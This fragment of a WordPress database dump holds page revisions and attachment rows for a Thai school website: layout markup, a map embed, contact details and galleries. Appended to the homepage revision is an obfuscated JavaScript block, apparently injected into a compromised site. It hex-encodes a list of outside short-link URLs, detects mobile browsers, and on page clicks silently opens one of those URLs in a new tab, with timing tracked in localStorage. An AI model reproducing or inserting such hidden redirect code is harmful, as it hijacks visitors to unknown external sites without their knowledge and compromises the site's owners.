label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:38:45','2024-08-07 14:38:45','',14,'http://pakhaeng.ssk.in.th/?p=667',0,'revision','',0),
(668,1,'2024-08-07 21:41:57','2024-08-07 14:41:57','','ปขก3','','inherit','','closed','','%e0%b8%9b%e0%b8%82%e0%b8%813','','','2024-08-07 21:41:57','2024-08-07 14:41:57','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png',0,'attachment','image/png',0),
(669,1,'2024-08-07 21:42:08','2024-08-07 14:42:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"slider\",\"imageRatio\":\"land169\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button 